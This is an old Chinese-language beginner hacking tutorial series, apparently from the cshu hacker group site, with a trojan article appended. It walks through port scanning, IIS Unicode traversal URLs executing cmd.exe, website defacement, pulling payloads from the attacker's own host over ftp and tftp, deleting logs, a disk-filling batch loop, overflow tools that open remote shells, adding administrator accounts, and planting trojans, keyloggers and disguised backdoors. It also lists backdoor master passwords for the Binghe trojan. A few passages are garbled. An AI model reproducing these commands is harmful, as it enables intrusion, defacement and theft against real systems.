知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值

21--ftp 重要哦

23--telnet 欢呼吧

25-smtp 尽管重要，但似乎没什么可利用的

53--domain 同上

79--finger 可知道用户信息了

80--http 要看网页，没它不行吧

110--pop 收信的

139--netbios 共享用的，很有利用价值哦

3389--win2000超级终端 呵呵，这个好！

其实端口有上千种，这些最最常用

我们怎么知道服务器有什么端口打开呢？？去找个扫描器吧，x-scan ,super scan,flux等等很多哦。这里我推荐super scan ，速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧!）

那么我们该如何应对呢？

ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：）

若有ftp,那就用用匿名登陆。自己动手也行，最好用x-scan flux等吧！反正，有ftp就有一份希望

telnet在！好!telnet 111.111.222.222，出现窗口了吧！嗯？要密码？看来网管还不是超级注意文明用语：）随便猜个，错了，闪人！

smtp,看着它，无奈

domain，一般它带了局域网了

finger 可以知道用户列表了，不好，忘了用法了，幸好finger很少出现

80肯定在，我们等会来对付它

110 有smtp，pop在也不奇怪了

139 找个扫描器来找找有没有露在外面的共享吧，日后也用得着

3389 太太太好了！！打开客户端吧，用输入法漏洞试试，成了就干了它！不成也没事，我们以后完全控制它3389会很方便的。

端口扫完了！我们在多了解它一点吧！追捕大家都知道吧，其实用它获取主机信息也不赖哦。打开追捕，输入ip,选择智能追捕，是不是有很多信息出来了？虽然不能直接利用，但毕竟我们有对它有了进一步的了解。

掌握了那么多信息，我们该做点什么了，一般黑客入侵都是靠着系统漏洞，不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。

对漏洞大家可能不太了解，我这里也不能一一说明了，太多了，感兴趣的话去论坛找freedom吧！

目前广泛利用和存在的漏洞有：unicode,unicode后续，iis溢出，.idq,.frontpage extend,输入法漏洞等等大漏洞。 至于如何确定，呵呵，绝对不会是一行一行地在ie中试吧，拿出x-scan吧，很好的扫描器哦！

稍微设置一下就上路吧！过了一会，呵呵，报告出来了，快看，哇！漏洞一大堆！这下赚了！各条漏洞都有详细的信息，大家看吧，总比我说的准了。

基础知识（2）


二，一切从基础开始

由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：(假设11.11.22.22有漏洞）

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

如果成功，那么在浏览区可看到如下信息：

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）

是不是有自己机器的感觉了，正点！就是这种感觉！

cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！

http://11.11.22.22/msadc/..%c1%1 ... em32/cmd.exe?/c+dir （这个命令同样道理）

大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

会dos的朋友一定懂其意义了，不懂的请去看书 .

不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

三，实战演练

1，修改主页！（是不是很爽？）

一般主页位置在c:\inetpub\wwwroot下，但要是改了路径，就需要找找了。

最方便的方法：在浏览器里输入 http://11.11.22.22/.ida要是有漏洞，那在浏?..皇俏颐堑氖籽　?/a>

分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

dir/s法：首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？ iloveu.gif，然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。

找到了目录，就要对它开刀了！一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm

那么我们就修改它吧！

最方便的方法：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

回应为：HTTP 500 - 内部服务器错误

通过对cmd的分析，袁哥得出一条简便的方法，加入"符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

回应为：cgi错误，不用理会

两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？不错吧

而在实际想跳楼作中，可能袁哥的方法也会失效，这时，我们就可以copy cmd.exe 为另一个exe，记住路径，用copy后的来echo

例如：11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上传法：echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，那就应该用改好的主页

基础知识（3）

上传，这个我们后面介绍。

几点忠告：

1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德

2，echo前记得帮他们做好备份

3，不准在主页里加入恶性语句

2，下载文件

要是有什么有用的文件被你发现，那我们如何下载呢？

最简单的方法：把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后，下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。

别的方法：对不起，没想好：）

3，最重要的上传

一般方法：ftp法

首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧

echo+open ftp.cshu.com（ftp主机） > c:\hehe.haha

echo+user yourname >> cc:\hehe.haha (yourname是用户名)

echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)

echo+get setup.exe >> c:\hehe.haha 要下载的文件

echo+quit >> c:\hehe.haha

完了以后：ftp+/s:c:\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录）

别忘了先上传到ftp主机，不要做马大哈哦！

最简单的方法：tftp法。

这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）

在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：）

安装好后运行，别忘了设置好默认目录，否则会找不到文件

tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe（ihateu.exe在默认目录里）

1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！

学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样）

4，如何清除痕迹

虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！

C:\winnt\system32\logfiles\*.*

C:\winnt\ssytem32\config\*.evt

C:\winnt\system32\dtclog\*.*

C:\winnt\system32\*.log

C:\winnt\system32\*.txt

C:\winnt\*.txt

C:\winnt\*.log

全……擦掉！

四，细节问题。

1，遇到长文件名怎么办？

c:\program files\

就用c:\"program20%files"\

2，遇到空格怎么办？
%代替喽，或者xx yy=xxyy~1
基础知识（5）


%代替喽，或者xx yy=xxyy~1

3,如何做个很大的文件？

目的就是破坏啦！我不喜欢不过教教你们啦

@echo off

echo big > c:\a.a

:h

copy c:\a.a+c:\a.a c:\a.a

goto h

注意不要乱来啊！

4，输入命令，没反应或反应不对。

：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在给你几个吧！

http://www.exsample.com/scripts/ ... macr;..À
¯../winnt/system32/cmd.exe?/c+dir+c :\ 或 http://www.exsample.com/msadc/.. ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:\

不一定有用哦！

5，如何找到unicode漏洞的主机

呵呵：）最好的方法自然是………………一个一个ping,一个一个试喽：）

不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如牛*，随便找个吧！

6，我copy，del文件，怎么显示aceess denined?

这个不好办了，由于unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！

这个我会在今后介绍，现在你可以试试attrib

attrib -r -h -s c:\autoexec.bat

再对autoexec.bat进行想跳楼作，看看有没有效果，成功率不高，不好意思！

7，我黑了主页，天下无敌？

我本来想对你说：“见你的鬼去吧！”不过想想不大礼貌，有失我绅士风度，所以改个口

echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极目标！

对cshu全体成员来说，不准去改正在建立的网页！这是我们的原则！

要是你想耍耍威风，那也可以理解，那就去黑外国的，或者url欺骗也是个好选择

8，我如何做更多的事？

第一，努力提高权限

第二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！


一，frontpage扩展攻击。

为什么把它放第一位呢？原因很简单，它最最方便，frontpage服务器扩展是一种方便的远程站点管理功能，可是由于某些网管注意文明用语的疏忽（为什么注意文明用语满街飞？）不设置访问密码，如果那样的话，我们只要用一个frontpage就可以黑它了！！这完全不是黑客工具，但它确实办到了，还要感谢注意文明用语网管和微软啊！

具体做法：

1，准备frontpage，我是用dreamweaver的，但它不能黑啊：）最好是2000版，只是不要是老掉牙的版本就行了。

2，找一台有frontpage扩展的主机，可以用流光，也可以用搜索引擎查找/_vti_pvt/，这是frontpage扩展的标志。

3，接下来打开frontpage,(妈妈：你在干什么？回答：做网页！妈妈：好孩子！）文件菜单下选择“打开站点”，然后在文件夹框里写入 http://11.11.22.22（我习惯用这个做例子，以...僮魍?页文件了??/a>

4，万一跳出错误信息，表示有密码（这个不算注意文明用语）这时我们试着用以下url, http://11.11.22.22/_vti_pvt/service.pwd,

我的看法：

这个漏洞只能说明网管的疏忽，对我们而言是没有什么利用价值的，只可以改改网页，也许这也够了，但要进一步控制主机，此漏洞就无能为力。消遣时可以玩玩。

二，iis.printer溢出攻击

据说缓冲区溢出攻击是黑客入侵时70%所选的方法，看起来有点夸张，但确实有道理，因为暴力密码破解在网络上变得非常之慢，而像unicode的解码漏洞所取得的权限又太低，而缓冲区溢出一般可取得system权限，是非常有用的！

具体原理我也不是很清楚，只能说个大概：当我们向系统发出超出缓冲区大小的数据处理请求时，便会引发溢出，并弹出错误对话框，我们常看到的“非法想跳楼作”其实也是可能是由于溢出。而当溢出时，eip发生错误，有汇编知识的朋友应该记得，eip是控制执行代码的位置（顺便问一下，有没有会crack的高人，记得做我老师）这时加入一段恶性代码，算好发生溢出时的eip值，这样溢出时就会执行恶性代码而不是当掉。非法想跳楼作我们知道多的不得了，因此…… 溢出攻击是非常强大的！

由于汇编对于我们来说较难掌握，加之对溢出的了解很有限，那么我们只能借助高手们的程序来黑了。

具体方法：

1，准备iishack，本站有下载，该版本可以对多种系统进行攻击。

2，用x-scan或流光扫描一个有iis.printer漏洞的主机，然后就可以攻击了。

3，在命令行方式执行iis5hack (主机ip) (端口号，默认80）（系统代号，具体可参考程序的说明） （ shell口）

例如：iis5hack 11.11.22.22 80 1 111(以为在111端口开一个shell)

4,用nc或telnet连上，nc/telnet 11.11.22.22 111,成功的话就可以控制机器了，加个用户，做个代理……

我的看法：

这算是一个比较有用的漏洞了，它能帮助我们取得system权限，其实和admin差不了多少了，对于做一台跳板是非常有利的，希望大家熟练掌握。

三，idq/ida漏洞溢出攻击

这是时下很热门的了，原理和上面的printer相似，目前我只找到了iis5的攻击程序，在cshu里也可以找到的，我们准备的是snake的gui版本，很方便的。

具体方法：

1，准备snakeiis溢出程序。可以从本站下载。

2，ida/idq漏洞很多的，但win2k的服务器就不是那么普遍了，所以用你熟练的扫描器去找一打win2k的机器吧。

3，程序的界面是很傻瓜的，把ip填入，选择好类型，按下溢出按钮，显示shellcode发送完毕。

4，telnet/nc到你设定好的端口，如果成功的话，会显示目录下的信息（因为默认shellcode是dir)

5，欢呼吧！再次溢出，别忘了改shellcode为你想要的代码哦。

6，重复4，很快一台新鲜的win2k被你控制了！

我的看法：

我很喜欢用这种攻击，因为win2k的3389可以很方便的为我做事，省力地搞到一台win2k，然后慢慢享用，爽到根尖细胞啊！大家应该掌握这项方法。

四，*bsd telnetd溢出攻击

又是溢出，不过这个可是真正的热点哦，最近红盟等大型安全网站被黑就是因为这个！所以看看吧

具体方法：

1，使用fbsdhack for win2k来攻击，本站有下载的

2，还是要找到这样的主机，一般是xnix的，比较少的，用专门的扫描器吧，我会在不久放出来。

3，等吧！这个漏洞要发送的信息很大，大约16mb,可怕吧，所以最好用高速肉鸡

4，有幸成功了，记得请我吃饭！

我的看法：

这个漏洞的利用比较有难度，从找机器开始就是。但作为黑客爱好者，我们没有理由去回避它！




五，密码暴力破解

这是最最原始，也是最最基本的攻击的方式了，利用字典文件或暴力模式，对密码进行探测。费时费力，但若有经验的话，可以缩短这一过程。

具体方法：

1，找一个破解器，有ftp,http,smtp,pop3,telnet等等类型。

2，找到一台相应的主机。

3，设定一番，上路吧！你可以睡觉，可以去machine(就是做作业)，可以去泡妞……就是不要傻等。为什么呢？因为会伤视力的：）怎么倒了一片，起来起来！

4，万一成功了（之所以用这个词，是因为成功率很低的）表明你运气旺，赶紧下线，买彩票去吧


大家好，这几天被cgi程序搞得头昏脑胀，主要还是51的错，什么破东西，那么多错误！现在只好暂时借人家的地方用。

这是菜鸟想跳楼的最后第二节，说实话我还可以写很多的，但是作业还欠了一大堆：（为什么我没有满舟的狗屎运？算了算了，我不合那种欺世盗名之辈一般见识，开始做想跳楼吧！

不知道大家对unicode和溢出攻击是不是熟练了？没有的要加油哦！今天我们来谈谈权限的提升。

在windows系统中，最高的权限掌握在administrators的手里，在xnix中称为root,我们要完全掌握一台机器，拿到admin是不可或缺的。

首先说说最简单的:system to admin

当我们用溢出攻击成功后，其实我们已经拿到了system权限（具体看每种攻击而可能有所不同）这时我们很容易拿到admin权限。首先看看一下命令：

net user 察看用户表 net user username pass /add(添加密码为pass的用户username)

net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组

net use \\ip\ipc$ "password" /user:username 这是远程连接的命令

假如我们溢出了11.11.22.22，那么这样做吧！

net user （看到了iusr_machinename的用户了，它一般没什么权限的）

基础知识（4）

net user iusr_machinename cshu （把它的密码设为cshu）

net localgroup administrators iusr_machinename /add（加入administrators组）

这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！

熟悉一下net use 命令：

net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立连接

copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上，若是c$.d$,就表示c,d盘

net time \\11.11.22.22 看到了时间了，比如是8点

at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。

net use \\11.11.22.22 /delete 断开连接

应该是很简单的。这样我们就可以随心所欲地想跳楼作11.11.22.22了，admin是最高权限，所以没有限制的：）

是不是很简单？所以我是溢出是很厉害的攻击方法。

3389知道吧！如果能进入，那么用上面的命令也可以轻易拿到admin的，不过呢，有3389漏洞的机器已经不多了。看你运气了！（本站有几篇关于3389的好文章）

总的来说，还是unicode的机器最多，为什么注意文明用语网管不会灭绝呢：）虽然unicode拿admin有一定难度，但还是要试试的。

首先，我们检查一下unicode在这台机器上的权限，一般看读写权限和运行权限。用copy 或del命令便可确定读写权限，然后上传文件运行一下便可知道运行权限。

1，如果我们可以对winnt\repair和winnt\config进行访问，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下载下来，或者把它复制到inetpub\wwwroot下，改成zip下载。

拿到sam后，用lc3破解版暴力破解吧，这种方法比较费时。

2，要是有运行权限，拿就抛个木马上去吧！虽说木马可能也会没有权限，但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是，最好放最新的木马，因为木马很容易被杀毒软件查杀！

3，其实和2差不多，只不过变成了键盘记录器，选个国产的，一般杀毒软件不会杀出来，认真配置好后传上去，下线睡觉或是做家务去！等到网管用了机器，密码就会被纪录下来，我们在去取，admin就顺利到手了：）

4，getadmin和pipeupadmin，前者是nt4用的，后者是2000。看看帮助知道使用方法后（其实猜都猜得到）就可以提升一个用户的权限，有一步登天的感觉！

5，手工做个bat文件，里面是建立用户等命令，然后把它放到自启动下，有很多途径：documents and settings下的开始菜单下的启动，知道了吧，至于要顺利放进去的话，会遇到空格长名等等问题，就看你的基本功了。win.ini里有load，加进去。还有便是注册表，好好研究一下regedit.

6，本地溢出。这个比较高深，我能告诉大家的只是，去四处找找本地溢出程序。

总的来说，unicode改主页是非常简单的，但是若是要取得更高的权限，就要一番努力，上面的方法只是些思路，实际想跳楼作时需要具体处理，开动脑筋，把方法都结合起来。（是不是听起来有点玄？）

想想好像没有什么其他的途径要说了，什么？linux,呵呵，我还不大懂，就不在这里瞎说了。

那今天就说到这里了，6里面我会说说后门制作，小问题和我的一点经验。期待吧！



这是最后一节了，写的傻傻的，但我毕竟坚持下来了，值得鼓励！（偶尔阿q一下）在写菜鸟想跳楼的同时，我们的cshu(cshu.51.net)也在默默成长，但现在我要准备离开了，真是有点舍不得。在今后的日子里，还请大家多多支持cshu和christ,freedom他们。

今天说点什么呢？没有主题，乱谈一通吧！

首先我要吐一次血，当然是为了推荐一样东西，就是流光！（那么没创意，老土！）不管怎么说，小榕的流光应该是中国第一黑软，他综合了诸多的攻击手段，使攻击便捷化，当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。

我来说说我自己觉得最有用的几个项目：

1，探测----扫描pop3/ftp/nt/sql主机，要是无目的地黑，那么用这个再合适不过了。进去后填好ip范围（范围可以扫大一点，它很快的），至于类型嘛，要是你要一大堆unicode，那么选择iis/frontpage再合适不过了，要是要更高的权限，sql是不错的选择。完成后，表格里会多出一大堆东西。

remote execute-x 这是几种不同的unicode，用它比用ie来执行方便多了，但是echo有问题（是我自己不会，会的朋友快教我）

remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件，要使用的话，你首先要有一个ftp账号，去申请吧！顺利拿到cif文件后，用流光自带的工具就可以解开密码，很爽的！

remote ftp sam -x 拿sam的，还是用最好的lc3来解吧！

frontpage extended 这是frontpage扩展，不过不要高兴，是要密码的。但是若是后面跟了privilege hole的话，放声大笑吧！（小心不要让邻居拿着菜刀冲进来）打开frontpage，打开站点， http://ip就可以了！（http://不要忘）

此外还有一点变通，大家肯定读的懂的。

2，探测----高级扫描工具。这可是流光4中的重头戏，综合了很多漏洞，还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测，很快扫出漏洞后，流光会生成一个报告文件，其中包含漏洞的连接，要是你看不懂的话，建议你拿出x-scan，里面有漏洞描述的。

3，工具----nt管道远程命令，种植者，这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号，相信在此之前你应该有几个了吧，那就快点试试吧！

总的来说，流光的使用是非常简单的，其中也有不少工具值得我们一用，tools目录里有一些很好的工具，exploit里则有很多溢出攻击程序，前提是你应该会c,不会的话我也没办法，学会c起码要看10倍于菜鸟想跳楼的资料吧！另外给大家推荐一个站点：www.hack.co.za，有什么漏洞的话就去那里找找，你会有所收获的。


然后我想说说一些黑站的经验。

☆当我们用unicode控制一台机器时，我向大家推荐用asp木马，阿新的改良版，本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息，最好也放一个cmd.asp上去，运气好的话，可以运行命令的。

上传好后，ie里输入其中index.asp的地址，呵呵，我们就能方便地管理其中的文件了，可以改网页，改代码，上传脚本文件麻烦？那就用它来生成吧！

推荐他的最大原因便是----便于隐藏！一般网站总有一个庞大的目录，选择一个深的，放进去，网管很难发现的：）

最后对大家说一句，要是有备份目录（很多网站都有的），最好也放一份进去。有一次我用这个东西修改一家网站的首页，改了两三次网管也没删掉，可是突然一天不行了，原来他用了备份的网页（还算机灵吧）

☆我想对大家说，对于国内网站，最好不要恶意去攻击，因为我们是中国人嘛！在5/1期间，我发现有一些国内站点被黑，留下的页面上不是poison box，而是中国人的话，这真是无耻到了极点！！！！大家千万不要学哦。还有，现在网上有很多还没有网页的主机，往往有很多漏洞，对于这种机器，竟有一些小人也会去改收页（比如上海那个姓杨的小子）这算什么？显示实力，炫耀技术？呵呵，见鬼去吧！

我的建议是，不要改它的首页，而是努力去拿admin,控制它，这样我们有很多选择：肉鸡，等它有正式主页后可以黑，或者把我们的主页放上去！比申请好多了，权限又足！当然很危险：）这样做是不是有品位多了？

☆要是我们拿到了admin，但有时却不能执行一些命令，那很可能是因为服务启动的问题。试着用以下命令：

net start termservice 启动win2k的终端控制

net start workstation 打开net use 功能

net start lanmanserver 打开ipc

net start eventlog 启动日志（你不会那么傻吧！stop）

net start schedule 打开计划(at)

net start server 共享

还有很多，net命令里去找吧！

☆打开telnet

1，远程去运行ntlm.exe，流光里有

2，net stop telnet

3, net start telnet

☆我推荐几种后门：winshell（默认端口5277）相对于srv，它好一些。remotenc这个是榕哥的作品，可以以指定用户执行，还可以自己起服务的名字，很棒的！

至于服务的名字，建议大家去看看win2k的进程名，学着起相类似的名字，要做到使网管看到了也不会引起警觉，或是有警觉也不敢去删，呵呵，这样就最好了！

☆代理问题。我推荐大家自己去做代理，控制了一台机器后，用snake前辈写的skserver去做个sock5。

具体做法就不详细说了，因为比较普通，只要熟悉一下用法就可以了。

做好了sock5，我们可以上oicq，下棋都用它，sock5代理可是很少见的哦！

要是实在拿不到sock5,用http也可以，这里推荐一个软件tcp2http，它具有很多功能。在给个站点：dzc.126.com国内最最好的的代理站点，怕死的朋友千万不要错过。

最后说说一些对于菜鸟同志的建议：

不要把黑当作一种显示自己的行为，要是你想耍威风，用url欺骗来骗mm最合适了，还可以弄个yahoo什么的……

不要在一项技术上停留过长时间，当你熟练掌握后，应该迅速学习下一个新技术。

不要和被你黑的网管过多接触，前车之鉴哦。

对于一台好机器要做好后门，不要轻易失去它。

想好好学黑客的话，就常去各大论坛转转，仔细读教程，忘记聊天室和网络游戏吧！

实践是最好的教程，再次重申！

应该多学计算机的其他方面的知识，任何知识在一定场合都是有用的。

编程技术……好像太难了，不过再难也要学。

想不出来了………………

好了，我们的菜鸟想跳楼终于结束了，我这个大菜鸟也可以退休了，拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站，不知道大家是否成功了，不管这么样，我们都该不断的努力学习，不是吗?

黑客常用兵器之木马篇（上）

“我知道远程控制是种武器，在十八般兵器中名列第七，木马呢?”
　　“木马也是种武器，也是远程控制。”
　　“既然是远程控制，为什么要叫做木马？”
　　“因为这个远程控制，无论控制了什么都会造成离别。如果它钩住你的E-Mail，你的E-Mail就要和你离别；如果它钩住你的QQ，你的QQ就要和你离别。”
　　“如果它钩住我的机器，我就和整个网络离别了?”
　　“是的。”
　　“你为什么要用如此残酷的武器?”
　　“因为我不愿被人强迫与我所爱的人离别。”
　　“我明白你的意思了。”
　　“你真的明白?”
　　“你用木马，只不过为了要相聚。”
　　“是的。”

　　一

　　在众多的黑客武器中特洛伊木马（Trojan horse）这种攻击性武器无论是菜鸟级的黑客爱好，还时研究网络安全的高手，都视为最爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具，木马的威力要比其他的黑客工具大得多。

　　“木马既然如此有效，为何在Hacker兵器谱中排名靠后？”

　　“因为使用木马往往不是很光明正大。”

　　“哦？为何？”

　　“在使用木马的人群中菜鸟黑客居多，他们往往接触网络不久，对黑客技术很感兴趣，很想向众人和朋友显示一番，但是去驾驭技术不高，不能采取别的方法攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的最爱。而且随着国产化的木马不断的出现，多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了，他们通常会在得到一个服务器权限的时候植入自己编写的木马，以便将来随时方便进出这台服务器。”

　　“但如此一来木马的名声不就随之降低了吗？”

　　“是的，所以现在的黑客高手都耻于用木马，更耻于黑个人的计算机。”

　　“不过木马在很多人的眼中仍然是一等一的绝好兵器。”
在众多的木马之中Cult of Dead Cow开发的Back Orific2000应该算是名气比较大的一个。这款软件是在Back Orific2.1的基础之上开发的，但是他最大的改动就是增加了对Windows NT服务器系列的支持。作为微软的高端产品，BO2000的这个功能无疑对Windows NT来说是致命的，就Windows NT本身而言，由于硬盘采取了NTSF的加密，普通的木马，包括冰河也无法控制，当然要想要让多数木马无法对Windows NT发挥作用最好将Windows NT转化为NTSF的格式下才会比较好用一些。

　　而正因为如此BO2000才深得黑客高手的喜爱，因为他们感兴趣的也只有服务器，也只有Web Server才能够提起他们的胃口，那是一种来自深层感官的刺激。

　　通常情况下木马大致可分为两个部分：服务器端程序和客户端程序。服务器端通常就是被控制端，也是我们传统概念上的木马了。

　　二

　　“你说BO2000好，但是绝大多数的杀毒招数都能够沟将其制服，而且我感觉他在使用上不如我手里的冰河锐利，况且我也不想黑什么服务器。我认为，个人电脑中隐藏有更大的宝藏，而且个人电脑脆弱的我能够利用任何一种方法摧毁它。

　　“你说的很对，冰河确实锐利，而且称霸中华江湖一年之久，也可谓武林中少见的好兵刃，但是兵器虽然锋利，但兵器在打造的时候却留下来一个致命的缺点，这也是木马冰河为何在武林衰败的原因。”

　　“这是一个什么样的弱点那？竟然如此致命？”

　　“呵呵，说白了也很简单，冰河的作者在打造冰河2.X版本时就给它留下了一个后门，这个后门其实就是一个万能密码，只要拥有此密码，即便你中的冰河加了密码保护，到时候仍然行同虚设。”

　　“什么！真有此事？想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用，如此这般，他们的机子岂不暴露无遗？”

　　“呵呵，在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么，多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手，致命的一招。冰河的作者当然也不例外，而且由于作者钟爱许美静，所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。”

　　“噢？万能密码？”

　　“通常黑客在植入冰河这种木马的时候，为了维护自己的领地通常的要为自己的猎物加一个密码，只有输入正确的密码你才能够正常的控制对方的计算机，但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码，就像万能钥匙一样。冰河各版本的通用密码：

　　2.2版：Can you speak Chinese?
　　2.2版：05181977
　　3.0版：yzkzero!
　　4.0版：05181977
　　3.0版：yzkzero.51.net
　　3.0版：yzkzero!
　　3.1-netbug版密码: 123456!@
　　2.2杀手专版：05181977
　　2.2杀手专版：dzq20000!

你可以试试看，是不是很轻松的就能够进入任何一台有冰河服务器端的电脑？”

　　“真的进入了，果然有此事情，怪不得现在很多人都不再使用冰河。”

　　“此外冰河还存在着两个严重的漏洞：

　　漏洞一：不需要密码远程运行本地文件漏洞。

　　具体的想跳楼作方法如下：我们选择使用相应的冰河客户端，2.2版以上服务端用2.2版客户端，1.2版服务端需要使用1.2版客户端控制。打开客户端程序G_Client，进入文件管理器，展开“我的电脑”选中任一个本地文件按右键弹出选择菜单，选择“远程打开”这时会报告口令错误，但是文件一样能上传并运行。

　　任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了，如果你高兴的话，还可以上传病毒和其它的木马。

　　漏洞二：不需要密码就能用发送信息命令发送信息，不是用冰河信使，而是用控制类命令的发发送信息命令。”

　　“当然这的确是一个原因，但更主要的是现在的多数杀毒软件都能克制冰河。”

　　三

　　木马通常会在三个地方做手脚：注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件，绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马，木马phAse 1.0版本和NetBus 1.53版本就可以以捆绑方式装到目标电脑上，可以捆绑到启动程序上，也可以捆绑到一般程序的常用程序上。如果木马捆绑到一般的程序上，启动是不确定的，这要看目标电脑主人了，如果他不运行，木马就不会进入内存。捆绑方式是一种手动的安装方式，一般捆绑的是非自动方式启动的木马。非捆绑方式的木马因为会在注册表等位置留下痕迹，所以，很容易被发现，而捆绑木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等，位置的多变使木马有很强的隐蔽性。

　　“在众多木马中，大多数都会将自己隐藏在Windows系统下面，通常为C:\Windows\目录或者C:\Windows\system\与C:\Windows\system32下隐藏。”

　　“众多的目录中为何选择这两个目录？”

　　“呵呵，当然是为了便于隐蔽。通常这几个目录为计算机的系统目录，其中的文件数量多而繁杂，很不容易辨别哪些是良性程序哪些是恶性程序，即便高手往往也会有失误删除的情况。而且，即便放置在系统目录下，就多数为重要的文件，这些文件的误删除往往会直接导致系统严重的瘫痪。”

　　“原来如此。”

　　“前辈，木马冰河是否也做了这些手脚？”

　　“这是自然，木马一旦被植入目标计算机中要做的最重要的事就是如何在每次用户启动时自动装载服务端。冰河也是如此了。首先，冰河会在你的注册表中的 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和 RUNSERVICE 键值中加上了\kernl32.exe(是系统目录)，

　　§c:\改动前的RUN下
　　默认=""
　　§c:\改动后的RUN下
　　默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe"
　　§c:\改动前RunServices下
　　默认=""
　　§c:\改动后RunServices下
　　默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe"
